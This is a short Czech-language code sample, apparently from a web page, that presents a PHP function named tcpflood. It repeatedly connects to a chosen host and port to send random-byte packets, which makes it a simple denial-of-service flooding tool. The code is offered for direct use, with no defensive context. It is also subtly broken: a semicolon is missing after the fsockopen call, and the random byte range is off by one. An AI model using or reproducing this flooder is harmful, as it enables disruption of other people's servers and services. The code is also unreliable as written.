Ukázka jednoduché TCP flood funkce. Stačí zadat cílovou adresu, cílový port, počet packetů, velikost každého packetu a časovou prodlevu v sekundách mezi dvěmi odesláními.

function tcpflood($host, $port, $packets, $packetsize, $delay){
 $packet = "";
 
 // creating a packet
 for($i = 0; $i < $packetsize; $i++)
  $packet .= chr(mt_rand(1, 256));
 
 for($i = 0; $i < $packets; $i++){
  $fp = @fsockopen("tcp://" . $host, $port, $e, $s, 5)
  @fwrite($fp, $packet);
  @fclose($fp);
  sleep($delay);
 }
}